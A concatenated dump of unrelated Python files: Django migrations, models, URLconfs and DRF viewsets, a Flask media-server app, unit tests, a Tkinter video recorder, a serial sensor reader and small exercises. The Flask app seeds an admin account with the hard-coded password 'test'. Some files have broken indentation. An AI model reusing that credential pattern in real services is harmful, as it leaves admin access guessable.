                ('movie_langpack_id', models.AutoField(primary_key=True, serialize=False)),
                ('is_default', models.PositiveIntegerField(blank=True, choices=[(0, 'not default language'), (1, 'is default language')], null=True)),
                ('title', models.CharField(blank=True, max_length=100, null=True)),
                ('description', models.CharField(blank=True, max_length=1000, null=True)),
                ('actors', models.ManyToManyField(related_name='_movielangpack_actors_+', to='cms_test2.Actor')),
                ('directors', models.ManyToManyField(related_name='_movielangpack_directors_+', to='cms_test2.Director')),
                ('language', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cms_test2.Language')),
                ('movie_info', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cms_test2.MovieInfo')),
                ('thumbnails', models.ManyToManyField(related_name='_movielangpack_thumbnails_+', to='cms_test2.Thumbnail')),
            ],
        ),
        migrations.AddField(
            model_name='video',
            name='episode_info',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cms_test2.EpisodeInfo'),
        ),
    ]
|
from os import getenv, path, mkdir, sys, unlink, listdir, stat
# workaround to allow flask to find modules
CUR_DIR = path.dirname(path.abspath(__file__))
sys.path.append(path.dirname(CUR_DIR+"/"))
from flask import Flask, Response, request, cli, g, send_file, send_from_directory
from flask_cors import CORS
import sqlalchemy
from sqlalchemy.sql import text
import datetime
from db import *
from utils import *
from auth import *
import users, files, playlists, categories, comments, keywords, messages
from response import ResponseObject as JSONResponse
# NOTES:
# flask g is for storing data during requests like a temp global dictionary
app = Flask(__name__)
# Register auth blueprints (bpAdmin/bpLogin from auth) and one blueprint per
# resource module imported above.
app.register_blueprint(bpAdmin)
app.register_blueprint(bpLogin)
app.register_blueprint(users.bp)
app.register_blueprint(files.bp)
app.register_blueprint(playlists.bp)
app.register_blueprint(categories.bp)
app.register_blueprint(comments.bp)
app.register_blueprint(keywords.bp)
app.register_blueprint(messages.bp)
CORS(app, methods=['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'PATCH', 'LINK', 'UNLINK'])
# Flags driving create_db()'s one-shot retry: ERR_IN_CREATE records that a
# creation attempt already failed; FIX_ERR_IN_CREATE enables the retry.
ERR_IN_CREATE = False
FIX_ERR_IN_CREATE = True
def configure_app():
    """Load the config selected by SERVER_CFG, ensure the upload dir
    exists, bind the database and create the schema."""
    configs = {
        'production': 'config.ProductionCfg',
        'dev': 'config.DevCfg',
        'test': 'config.TestCfg',
        'default': 'config.DevCfg',
    }
    selected = getenv('SERVER_CFG') or 'default'
    app.config.from_object(configs[selected])
    upload_dir = app.config['UPLOAD_DIR']
    if not path.exists(upload_dir):
        mkdir(upload_dir)
    db.init_app(app)
    create_db()
def create_db():
    """Create all tables and seed the default admin account.

    On a sqlalchemy InternalError the database is dropped and recreated
    once (recreate_db() calls back into this function; ERR_IN_CREATE marks
    the retry, FIX_ERR_IN_CREATE enables it).  A second failure is fatal.
    The finally-block re-seeds the admin so the retry path also gets one.
    """
    global ERR_IN_CREATE
    with app.app_context():
        try:
            db.create_all()
            admin = Admin.query.filter_by(username='admin').first()
            if not admin:
                # NOTE(review): hard-coded default credentials — confirm
                # these are dev/test only.
                admin = Admin(username='admin',password='test')
                db.session.add(admin)
                db.session.commit()
        except sqlalchemy.exc.InternalError as err:
            # Fatal when retries are disabled or one already happened.
            isFatal = not FIX_ERR_IN_CREATE or ERR_IN_CREATE
            if not FIX_ERR_IN_CREATE:
                print("Will not try to fix")
            elif ERR_IN_CREATE:
                print("Could not be fixed")
                print(err)
            if isFatal:
                print("Fatal, exiting")
                exit()
            # print(err._sql_message()) TMI message
            print("Error:",err._message(),"\nTrying to fix, recreating database")
            ERR_IN_CREATE = True
            recreate_db()
        finally:
            # Runs after both the success and the retry path.
            admin = Admin.query.filter_by(username='admin').first()
            if not admin:
                admin = Admin(username='admin',password='test')
                db.session.add(admin)
                db.session.commit()
def clear_file_store():
    """Delete every regular file in the configured upload directory.

    Individual failures are logged and skipped so one bad entry does not
    abort the sweep.
    """
    upload_dir = app.config['UPLOAD_DIR']
    for name in listdir(upload_dir):
        full_path = path.join(upload_dir, name)
        try:
            if path.isfile(full_path):
                unlink(full_path)
        except Exception as e:
            print('clear_file_store error',e)
def clear_db():
    """Drop every table and wipe the upload directory.

    MySQL refuses to drop tables referenced by foreign keys, so
    FOREIGN_KEY_CHECKS is switched off for the session before drop_all()
    and restored afterwards.  The repeated thread_id() prints exist to
    verify each statement runs on the same connection/session.
    """
    with app.app_context():
        t_id = db.session.connection().connection.thread_id()
        print(t_id,'session commit')
        db.session.commit()
        t_id = db.session.connection().connection.thread_id()
        result = db.engine.execute('show variables where variable_name="FOREIGN_KEY_CHECKS"')
        data = get_query_data(result)[0]
        message = "Foreign checks are off for current session, drop statement may succeed" if data['Value'] == 'OFF' else "Foreign checks are on"
        print(t_id,message,data)
        t_id = db.session.connection().connection.thread_id()
        print(t_id,'Turning foreign checks off')
        db.engine.execute('set FOREIGN_KEY_CHECKS=0')
        t_id = db.session.connection().connection.thread_id()
        result = db.engine.execute('show variables where variable_name="FOREIGN_KEY_CHECKS"')
        data = get_query_data(result)[0]
        message = "Successfully turned off, drop statement should succeed" if data['Value'] == 'OFF' else "Failed to turn off, drop statement may error"
        print(t_id,message,data)
        t_id = db.session.connection().connection.thread_id()
        print(t_id,'Dropping all tables')
        db.drop_all()
        clear_file_store()
        db.engine.execute('set FOREIGN_KEY_CHECKS=1')
def recreate_db():
    """Drop everything, rebuild the schema, and clear the retry flag.

    Called both by the DELETE /db route and by create_db()'s error path;
    ERR_IN_CREATE is reset here so a successful rebuild ends the retry.
    """
    global ERR_IN_CREATE
    clear_db()
    create_db()
    if ERR_IN_CREATE:
        print("Successfully fixed error")
        ERR_IN_CREATE = False
@app.route('/')
def index():
    # Liveness probe.
    return "OK"
@app.route('/db',methods=['DELETE'])
@admin_auth.login_required
def delete_db():
    # Admin-only: wipe and recreate the whole database and file store.
    recreate_db()
    return "OK"
@app.after_request
def add_accept_ranges(response):
    # Advertise byte-range support on every response (media seeking).
    response.headers.add('Accept-Ranges','bytes')
    return response
cli.load_dotenv()
configure_app()
# flask run ignores app.run; this branch only matters for `python app.py`.
if __name__ == "__main__":
    if app.config['SERVE_PUBLIC']:
        app.run(host='0.0.0.0')
    else:
        app.run()
|
from django.db import models
class Author(models.Model):
    # Minimal author record; books reference it via Book.author.
    name = models.CharField(max_length=200)
class Book(models.Model):
    # A published book; deleting the author cascades to its books.
    title = models.CharField(max_length=200)
    published = models.DateField()
    author = models.ForeignKey(Author, on_delete=models.CASCADE)
|
import multiprocessing
import Tkinter as tk
import cv2
e = multiprocessing.Event()
p = None
# -------begin capturing and saving video
def startrecording(e):
    """Capture frames from the default camera and save them to a video
    file until the shared Event *e* is set.

    Bug fixes vs. the original:
    - `out` was never created, so the first `out.write(frame)` (and the
      `out.release()` on shutdown) raised NameError; a cv2.VideoWriter is
      now opened alongside the capture.
    - after releasing the capture on shutdown the loop fell through to
      `cap.read()` on a released device; it now breaks immediately.
    """
    cap = cv2.VideoCapture(0)
    # NOTE(review): frame size must match what the camera delivers or the
    # writer silently produces an unplayable file — confirm 640x480.
    fourcc = cv2.VideoWriter_fourcc(*'XVID')
    out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480))
    while cap.isOpened():
        if e.is_set():
            # Stop requested: release resources, clear the flag, and exit.
            cap.release()
            out.release()
            cv2.destroyAllWindows()
            e.clear()
            break
        ret, frame = cap.read()
        if ret:
            out.write(frame)
        else:
            break
def start_recording_proc():
    # Run the capture loop in a separate process so the Tk UI stays
    # responsive; the module-level Event `e` signals it to stop.
    global p
    p = multiprocessing.Process(target=startrecording, args=(e,))
    p.start()
# -------end video capture and stop tk
def stoprecording():
    # Signal the recorder process to finish, wait for it, then tear down
    # the Tk window and event loop.
    e.set()
    p.join()
    root.quit()
    root.destroy()
if __name__ == "__main__":
# -------configure window
root = tk.Tk()
root.geometry("%dx%d+0+0" % (100, 100))
startbutton=tk.Button(root,width=10,height=1,text='START',command=start_recording_proc)
stopbutton=tk.Button(root,width=10,height=1,text='STOP', command=stoprecording)
startbutton.pack()
stopbutton.pack()
# -------begin
root.mainloop()
|
#!/usr/bin/env python2.6
import logging
import unittest
if __name__ == '__main__':
    # Silence everything below CRITICAL while tests run; switch to the
    # DEBUG line below when diagnosing failures.
    logging.basicConfig(level=logging.CRITICAL)
    # logging.basicConfig(level=logging.DEBUG)
    unittest.main()
|
#!/usr/bin/python3
import sys
from importlib import import_module
# Load the module "<name>.<name>" named by the first CLI argument and call
# its `run` callable with True.
mod = import_module(sys.argv[1] + '.' + sys.argv[1])
run = getattr(mod,'run')
run(True)
|
"""Rejestracja URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
from remote_registration.views import *
# Project-level routes: admin, app URLconf, auth views and the full
# password-reset flow.
# NOTE(review): `reverse_lazy` (used below) is not imported here —
# presumably it arrives via `from remote_registration.views import *`;
# confirm, otherwise import it from django.urls.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('remote_registration.urls')),
    url(r'^login/$', LoginView.as_view(), name='login'),
    url(r'^logout/$', LogoutView.as_view(), name='logout'),
    url(r'^user/details/$', UserDetailView.as_view(), name='user_details'),
    url(r'^user/add/$', AddUserView.as_view(), name='user_add'),
    url(r'^user/update/$', UpdateUserView.as_view(), name='user_update'),
    url(r'^user/update/password/$', ChangePasswordView.as_view(), name='user_update_password'),
    url(r'^user/reset/password/$', auth_views.PasswordResetView.as_view(template_name='remote_registration/reset_password.html',
                                                                        success_url=reverse_lazy('user_reset_password_done')),
        name='user_reset_password'),
    url(r'^user/reset/password/done/$', auth_views.PasswordResetDoneView.as_view(), name='user_reset_password_done'),
    url(r'^user/reset/password/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
    url(r'^user/reset/password/complete/$', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),
    #
]
|
# pylint: disable=missing-docstring
import doctest
import re
from unittest import TestCase
import awking
from awking import (LazyRecord, RangeGrouper, _ensure_predicate, _make_columns,
records)
class TestEnsurePredicate(TestCase):
    """_ensure_predicate accepts a string, compiled regexp or callable and
    always returns a callable; anything else raises TypeError."""
    def test_string(self):
        predicate = _ensure_predicate('^a')
        self.assertTrue(callable(predicate))
    def test_regexp(self):
        predicate = _ensure_predicate(re.compile('^a'))
        self.assertTrue(callable(predicate))
    def test_function(self):
        # noinspection PyUnusedLocal
        # pylint: disable=unused-argument
        def func(param):
            return True
        predicate = _ensure_predicate(func)
        self.assertTrue(callable(predicate))
    def test_invalid(self):
        with self.assertRaises(TypeError):
            _ensure_predicate(5)
class TestRangeGrouper(TestCase):
    """RangeGrouper(start, end, iterable) yields sub-iterables from each
    element matching `start` through the next element matching `end`;
    an unterminated final group is yielded truncated."""
    def test_one_group(self):
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 2, 5, 3, 5])
        self.assertEqual([[2, 5, 3]], [list(x) for x in grouper])
    def test_two_groups(self):
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 2, 5, 3, 5, 2, 4, 4, 3])
        self.assertEqual([[2, 5, 3], [2, 4, 4, 3]],
                         [list(x) for x in grouper])
    def test_no_match(self):
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 4, 0, 1])
        self.assertEqual([], [list(x) for x in grouper])
    def test_outer_iteration(self):
        # Groups can be pulled from the outer iterator before their
        # contents are consumed.
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 2, 5, 3, 5, 2, 4, 4, 3, 6])
        group1 = next(grouper)
        group2 = next(grouper)
        with self.assertRaises(StopIteration):
            next(grouper)
        self.assertEqual([2, 5, 3], list(group1))
        self.assertEqual([2, 4, 4, 3], list(group2))
    def test_regexp(self):
        # Compiled regexps are accepted directly as predicates.
        grouper = RangeGrouper(re.compile('a'), re.compile('b'),
                               'xf ga zu jd bq zu aa qa gb'.split())
        self.assertEqual([['ga', 'zu', 'jd', 'bq'], ['aa', 'qa', 'gb']],
                         [list(x) for x in grouper])
    def test_double_start(self):
        # A second start inside an open group does not begin a new group.
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 2, 2, 5, 3, 5, 2, 4, 4, 3])
        self.assertEqual([[2, 2, 5, 3], [2, 4, 4, 3]],
                         [list(x) for x in grouper])
    def test_double_end(self):
        # A second end outside a group is ignored.
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 2, 5, 3, 3, 5, 2, 4, 4, 3])
        self.assertEqual([[2, 5, 3], [2, 4, 4, 3]],
                         [list(x) for x in grouper])
    def test_one_item_group(self):
        # An element matching both predicates forms a one-item group.
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x % 2 == 0,
                               [1, 2, 5, 3, 3, 5, 4, 3])
        self.assertEqual([[2]], [list(x) for x in grouper])
    def test_truncated_last_group(self):
        grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
                               [1, 2, 5, 3, 3, 5, 2, 4, 4])
        self.assertEqual([[2, 5, 3], [2, 4, 4]],
                         [list(x) for x in grouper])
class TestLazyRecord(TestCase):
    """LazyRecord(text, splitter) indexes into the split fields; `[...]`
    and str() return the raw unsplit text."""
    def test_ellipsis(self):
        text = 'abc def jkzzz'
        record = LazyRecord(text, lambda x: x.split())
        self.assertEqual(text, record[...])
    def test_numerical_indices(self):
        # Positive and negative indices address the split fields.
        text = 'abc def jkzzz'
        record = LazyRecord(text, lambda x: x.split())
        self.assertEqual(('abc', 'jkzzz', 'jkzzz'),
                         (record[0], record[2], record[-1]))
    def test_out_of_range(self):
        text = 'abc def jkzzz'
        record = LazyRecord(text, lambda x: x.split())
        self.assertEqual(3, len(record))
        with self.assertRaises(IndexError):
            # noinspection PyStatementEffect
            # pylint: disable=pointless-statement
            record[3]
    def test_full_range(self):
        # A full slice materializes the field list.
        text = 'abc def jkzzz'
        record = LazyRecord(text, lambda x: x.split())
        self.assertEqual(['abc', 'def', 'jkzzz'], record[:])
    def test_str(self):
        text = 'abc def jkzzz'
        record = LazyRecord(text, lambda x: x.split())
        self.assertEqual(text, str(record))
class TestMakeColumns(TestCase):
    """_make_columns turns a list of widths into (start, stop) slices; a
    trailing Ellipsis produces an open-ended final column."""
    def test_one(self):
        self.assertEqual([(0, 5)], _make_columns([5]))
    def test_two(self):
        self.assertEqual([(0, 3), (3, 5)], _make_columns([3, 2]))
    def test_tail(self):
        self.assertEqual([(0, 3), (3, 5), (5, None)],
                         _make_columns([3, 2, ...]))
class TestRecords(TestCase):
    """records(lines, ...) yields LazyRecords split by whitespace
    (default), a separator string/regexp, fixed widths, or a field
    pattern."""
    def test_blank(self):
        lines = ['abc def jkzzz']
        self.assertEqual(['abc', 'def', 'jkzzz'], next(records(lines))[:])
    def test_separator(self):
        # A plain string separator keeps empty fields between repeats.
        lines = ['abx-something--rrr']
        self.assertEqual(['abx', 'something', '', 'rrr'],
                         next(records(lines, separator='-'))[:])
    def test_regexp(self):
        lines = ['abx-something--rrr']
        self.assertEqual(['abx', 'something', 'rrr'],
                         next(records(lines, separator=re.compile('-+')))[:])
    def test_widths(self):
        lines = ['abx-something--rrr']
        self.assertEqual(['abx', '-somet', 'hing--', 'rrr'],
                         next(records(lines, widths=[3, 6, 6, 3]))[:])
    def test_widths_with_tail(self):
        lines = ['abx-something--rrr']
        self.assertEqual(['abx', '-somet', 'hing--', 'rrr'],
                         next(records(lines, widths=[3, 6, 6, ...]))[:])
    def test_pattern(self):
        # `pattern` extracts matching substrings rather than splitting.
        lines = ['abx-something--rrr']
        self.assertEqual(['abx', 'something', 'rrr'],
                         next(records(lines, pattern='[a-z]+'))[:])
    def test_pattern_regexp(self):
        lines = ['abx-something--rrr']
        self.assertEqual(['abx', 'something', 'rrr'],
                         next(records(lines, pattern=re.compile('[a-z]+')))[:])
# noinspection PyUnusedLocal
# pylint: disable=unused-argument
def load_tests(loader, tests, ignore):
    # unittest load_tests protocol hook: also run awking's doctests.
    tests.addTests(doctest.DocTestSuite(awking))
    return tests
|
###############################
# This file is part of PyLaDa.
#
# Copyright (C) 2013 National Renewable Energy Lab
#
# PyLaDa is a high throughput computational platform for Physics. It aims to make it easier to submit
# large numbers of jobs on supercomputers. It provides a python interface to physical input, such as
# crystal structures, as well as to a number of DFT (VASP, CRYSTAL) and atomic potential programs. It
# is able to organise and launch computational jobs on PBS and SLURM.
#
# PyLaDa is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# PyLaDa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PyLaDa. If not, see
# <http://www.gnu.org/licenses/>.
###############################
def into_cell(position, cell, inverse=None):
    """ Fold a vector back into the periodic input cell

    :param position:
        Vector/position to fold back into the cell
    :param cell:
        The cell matrix defining the periodicity
    :param inverse:
        Optional. The *inverse* of the cell defining the periodicity. It is
        computed if not given on input.
    """
    from numpy import dot, floor
    from numpy.linalg import inv
    if inverse is None:
        inverse = inv(cell)
    # Work in fractional coordinates and drop the integer part; the small
    # tolerance keeps points sitting exactly on a cell boundary in place.
    fractional = dot(inverse, position)
    fractional = fractional - floor(fractional + 1e-12)
    # Back to Cartesian coordinates.
    return dot(cell, fractional)
def zero_centered(position, cell, inverse=None):
    """ Folds vector back to origin

    This may not be the vector with the smallest possible norm if the cell
    is very skewed

    :param position:
        Vector/position to fold back into the cell
    :param cell:
        The cell matrix defining the periodicity
    :param inverse:
        Optional. The *inverse* of the cell defining the periodicity. It is
        computed if not given on input.
    """
    from numpy import dot, floor, abs
    from numpy.linalg import inv
    if inverse is None:
        inverse = inv(cell)
    # Fractional coordinates wrapped into [-0.5, 0.5).
    fractional = dot(inverse, position)
    fractional -= floor(fractional + 0.5 + 1e-12)
    # Boundary normalisation: components that land (numerically) on +0.5
    # map to -0.5, anything that slipped below -0.5 wraps back up by 1.
    for axis in range(fractional.size):
        component = fractional[axis]
        if abs(component - 0.5) < 1e-12:
            fractional[axis] = -0.5
        elif component < -0.5:
            fractional[axis] += 1e0
    return dot(cell, fractional)
def into_voronoi(position, cell, inverse=None):
    """ Folds vector into first Brillouin zone of the input cell

    Returns the periodic image with the smallest possible norm.

    :param position:
        Vector/position to fold back into the cell
    :param cell:
        The cell matrix defining the periodicity
    :param inverse:
        Optional. The *inverse* of the cell defining the periodicity. It is
        computed if not given on input.
    """
    from numpy import dot, floor
    from numpy.linalg import inv, norm
    if inverse is None:
        inverse = inv(cell)
    # Start from the image inside the unit cell [0, 1)^3.
    fractional = dot(inverse, position)
    fractional -= floor(fractional)
    # Scan the 27 neighbouring images and keep the Cartesian-shortest one.
    best = fractional
    best_norm = norm(dot(cell, fractional))
    for di in (-1, 0, 1):
        for dj in (-1, 0, 1):
            for dk in (-1, 0, 1):
                candidate = [di, dj, dk] + fractional
                candidate_norm = norm(dot(cell, candidate))
                if candidate_norm < best_norm:
                    best_norm = candidate_norm
                    best = candidate
    return dot(cell, best)
def are_periodic_images(pos0, pos1, invcell=None, cell=None, tolerance=1e-8):
    """ True if two vectors are periodic images of one another

    :param pos0:
        First position
    :param pos1:
        Second position
    :param invcell:
        The *inverse* of the cell defining the periodicity
    :param cell:
        The cell defining the periodicity
    :param tolerance:
        Fuzzy tolerance criteria

    Only one of cell and invcell need be given.
    """
    from numpy import dot, floor
    from numpy.linalg import inv
    if invcell is None:
        if cell is None:
            # Bug fix: `from method import error` used to run on *every*
            # call, so the function always failed with ImportError when the
            # module was absent.  Import it lazily, only on this error path.
            from method import error
            raise error.ValueError("One of cell or invcell should be given")
        invcell = inv(cell)
    # Difference in fractional coordinates should be (close to) integral.
    result = dot(invcell, pos0 - pos1)
    result -= floor(result + tolerance)
    return all(abs(result) < tolerance)
|
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'getWays' function below.
#
# The function is expected to return a LONG_INTEGER.
# The function accepts following parameters:
# 1. INTEGER n
# 2. LONG_INTEGER_ARRAY c: contain values of coins
#
def dyn_get_ways(n, coins):
    """Count the ways to form amount *n* from *coins* (sorted ascending).

    ``ways[i][k]`` is the number of ways to form amount ``i`` using only
    the ``k`` largest coins; the answer is ``ways[n][m]``.  Bottom-up DP
    avoids recomputing the overlapping subproblems of the naive recursion:
    ``ways[i][k] = sum_j ways[i - coins[-j]][j]`` for ``j`` in ``1..k``.
    """
    print('sorted coins:', coins)
    m = len(coins)
    # One extra row/column so amounts 0..n and coin counts 0..m index
    # directly; amount 0 has exactly one way (the empty selection).
    ways = [[0] * (m + 1) for _ in range(n + 1)]
    ways[0] = [1] * (m + 1)
    for amount in range(coins[0], n + 1):
        for k in range(1, m + 1):
            for j in range(1, k + 1):
                coin = coins[-j]
                if coin <= amount:
                    ways[amount][k] += ways[amount - coin][j]
    return ways[n][m]
def getWays(n, coins):
    """Return the number of distinct multisets of *coins* summing to *n*.

    Order does not matter: (1, 2) and (2, 1) count as the same way.  To
    avoid double counting, coins are sorted first so the DP can enforce a
    canonical non-decreasing order of coin values — once a coin value is
    used, no smaller coin is used afterwards.
    """
    return dyn_get_ways(n, sorted(coins))
if __name__ == '__main__':
    # HackerRank harness: read n and m, then the coin values, and write the
    # answer to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    first_multiple_input = input().rstrip().split()
    n = int(first_multiple_input[0])
    m = int(first_multiple_input[1])
    c = list(map(int, input().rstrip().split()))
    # Print the number of ways of making change for 'n' units using coins having the values given by 'c'
    ways = getWays(n, c)
    fptr.write(str(ways) + '\n')
    fptr.close()
|
import urllib.request
# Download the Google China landing page and report its detected character
# encoding (chardet.detect returns e.g. {'encoding': ..., 'confidence': ...}).
rawdata = urllib.request.urlopen('http://www.google.cn/').read()
import chardet
print(chardet.detect(rawdata))
"""
# 使用viewset代替
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .models import Post
from .serializers import PostSerializer
@api_view(["GET"])
def post_list(request):
queryset = Post.objects.filter(status=Post.STATUS_NORMAL)
post_serializers = PostSerializer(queryset, many=True)
return Response(post_serializers.data)
class PostList(generics.ListCreateAPIView):
queryset = Post.objects.filter(status=Post.STATUS_NORMAL)
serializer_class = PostSerializer
"""
from rest_framework import viewsets
from rest_framework.permissions import IsAdminUser
from .models import Post, Category, Tag
from .serializers import (
PostSerializer, PostDetailSerializer,
CategorySerializer, CategoryDetailSerializer,
TagSerializer, TagDetailSerializer,
)
# class PostViewSet(viewsets.ReadOnlyModelViewSet):
class PostViewSet(viewsets.ModelViewSet):
    """API endpoint set for posts (list/create/retrieve/update/delete)."""
    queryset = Post.objects.filter(status=Post.STATUS_NORMAL)
    serializer_class = PostSerializer
    # Uncomment to restrict this viewset to admin users only.
    # permission_classes = IsAdminUser
    def retrieve(self, request, *args, **kwargs):
        # Single-object reads use the detail serializer.
        # NOTE(review): mutating self.serializer_class per request is
        # fragile; overriding get_serializer_class() is the conventional
        # DRF approach — confirm before changing.
        self.serializer_class = PostDetailSerializer
        return super().retrieve(request, *args, **kwargs)
    # Fetch all posts under a category by filtering via the query string.
    def filter_queryset(self, queryset):
        """
        Limitation: filtering here cannot also return the category's own
        fields — fetching posts and their category data stays split.
        """
        catetory_id = self.request.query_params.get("category")
        if catetory_id:
            queryset = queryset.filter(category__id=catetory_id)
        return queryset
# CategoryDetailSerializer returns a category together with all its posts.
class CategoryViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only category endpoints."""
    queryset = Category.objects.filter(status=Category.STATUS_NORMAL)
    serializer_class = CategorySerializer
    def retrieve(self, request, *args, **kwargs):
        """Single-category reads also include the category's posts."""
        self.serializer_class = CategoryDetailSerializer
        return super().retrieve(request, *args, **kwargs)
class TagViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only tag endpoints; detail reads use the detail serializer."""
    queryset = Tag.objects.filter(status=Tag.STATUS_NORMAL)
    serializer_class = TagSerializer
    def retrieve(self, request, *args, **kwargs):
        self.serializer_class = TagDetailSerializer
        return super().retrieve(request, *args, **kwargs)
|
"""
Aqui se implemento tomar 16 mediciones para tener un promedio del infrarrojo
"""
import serial
import matplotlib.pyplot as plt
import numpy as np
import time
def open_port():
    # Open the sensor's serial link on COM8 at 38400 baud.
    ser = serial.Serial('COM8', 38400)
    return ser
def close_port(port):
    # Release the serial port handle.
    port.close()
def detect_data(port):
    """Request one ADC sample from the device and return it as an int."""
    packet_size = 0
    # Request frame: 0xff announce, 0x00, length, 0x03 = ADC command.
    Trama_Camara = np.ones(packet_size+4, dtype="uint8")
    Trama_Camara[0] = 0xff
    Trama_Camara[1] = 0x00
    Trama_Camara[2] = 0
    Trama_Camara[3] = 0x03  # ADC command
    port.write(bytearray(Trama_Camara))
    # Read bytes until the 0xff frame-announce byte, then take the payload:
    # byte count followed by the ADC high and low bytes.
    while True:
        anuncio = port.read(1)
        anuncio = ord(anuncio)  # convert to integer
        if anuncio == 0xff:  # frame announce byte detected
            n_bytes = port.read(1)
            ADC_up = port.read(1)
            ADC_low = port.read(1)
            # NOTE(review): high byte weighted by 2**7, i.e. the low byte
            # carries 7 data bits — confirm against the firmware framing.
            ADC = (2 ** 7) * ord(ADC_up) + ord(ADC_low)
            break
    return ADC
def main():
    """Sample the IR sensor for ~1 second, keep readings within 10% of the
    minimum, and print the calibrated mean (comments translated from Spanish).
    """
    port = open_port()
    i = 0.00
    y = 0.00
    print("Inicio")
    Amplitud_matrix = np.array([])  # raw voltage samples
    Time_matrix = np.array([])      # sample timestamps (s since start)
    T_Inicio = time.time()
    T_Final = time.time()
    Dif = T_Final-T_Inicio
    # Calibration polynomial mapping voltage to the physical quantity.
    poly_infra = np.loadtxt('../Calibracion/Polinomio_Ajuste_Infra2.out')
    poly = np.poly1d(poly_infra)
    while(Dif < 1):  # sample for one second
        ADC = detect_data(port)
        ti = time.time()- T_Inicio
        Time_matrix = np.append(Time_matrix, [ti])
        y = ADC*3.1/(2**12-1)  # scaling: the ADC reference voltage is 3.1 V
        Amplitud_matrix = np.append(Amplitud_matrix, [y])
        # Keep only samples within 10% of the current minimum amplitude.
        Valor_min = Amplitud_matrix[np.argmin(Amplitud_matrix, 0)]
        indices, = np.where(Amplitud_matrix < (Valor_min + Valor_min * 0.1))
        T_filtrado = np.array([])
        Amplitud_filtrada = np.array([])
        for i in indices:
            T_filtrado = np.append(T_filtrado, [Time_matrix[i]])
            Amplitud_filtrada = np.append(Amplitud_filtrada, [Amplitud_matrix[i]])
        T_Final = time.time()
        Dif = T_Final - T_Inicio
    # Report the calibrated mean of the filtered samples.
    # NOTE(review): indentation was reconstructed; this print is assumed to
    # run once after the sampling loop -- confirm against the original.
    print(poly(np.mean(Amplitud_filtrada)))

if __name__ == "__main__": main()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2014 Lukas Kemmer
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Stand in for xml.etree.ElementTree which imports all its names and
wraps the parse and fromstring functions with expat-exception
conversion.
"""
from xml.etree.ElementTree import *
import faint.svg.expat_util as _expat
import faint as _faint
def _wrap_expat_exception(func):
"""Return the passed in function wrapped with a try-catch turning
document-related expat exceptions into faint.LoadErrors, so that
no parse stack trace is shown for errors in the SVG.
"""
def wrapper(*args, **kwArgs):
try:
return func(*args, **kwArgs)
except ParseError as e:
if _expat.is_document_related(e):
raise _faint.LoadError("Error in file:\n" + str(e))
else:
# Re-raise as internal error
raise
wrapper.__doc__ = func.__doc__
return wrapper
# Replace the module-level parse/fromstring (imported from ElementTree)
# with exception-converting wrappers.
parse = _wrap_expat_exception(parse)
fromstring = _wrap_expat_exception(fromstring)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 31 10:18:52 2018
@author: Urchaug
"""
#python program to find the HCF of two input numbers
#define a function
def hcf(x,y):
    """Return the highest common factor (greatest common divisor) of two
    integers.

    Fixes over the original trial-division loop:
    - Euclidean algorithm, O(log min(x, y)) instead of O(min(x, y));
    - no UnboundLocalError when an argument is 0 (hcf(0, n) == n);
    - the local result variable no longer shadows the function name.
    """
    x, y = abs(x), abs(y)
    while y:
        x, y = y, x % y
    return x
#take input from user (script entry point; blocks on stdin)
num1 = int(input("Enter first number:"))
num2 = int(input("Enter second number:"))
print("The H.C.F. of",num1,"and",num2,"is",hcf(num1,num2))
|
from django.shortcuts import render
from django.views.generic import TemplateView, ListView
from django.views.generic import CreateView, DetailView, DeleteView
from django.urls import reverse_lazy
from .forms import PhotoPostForm
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from .models import PhotoPost
class IndexView(ListView):
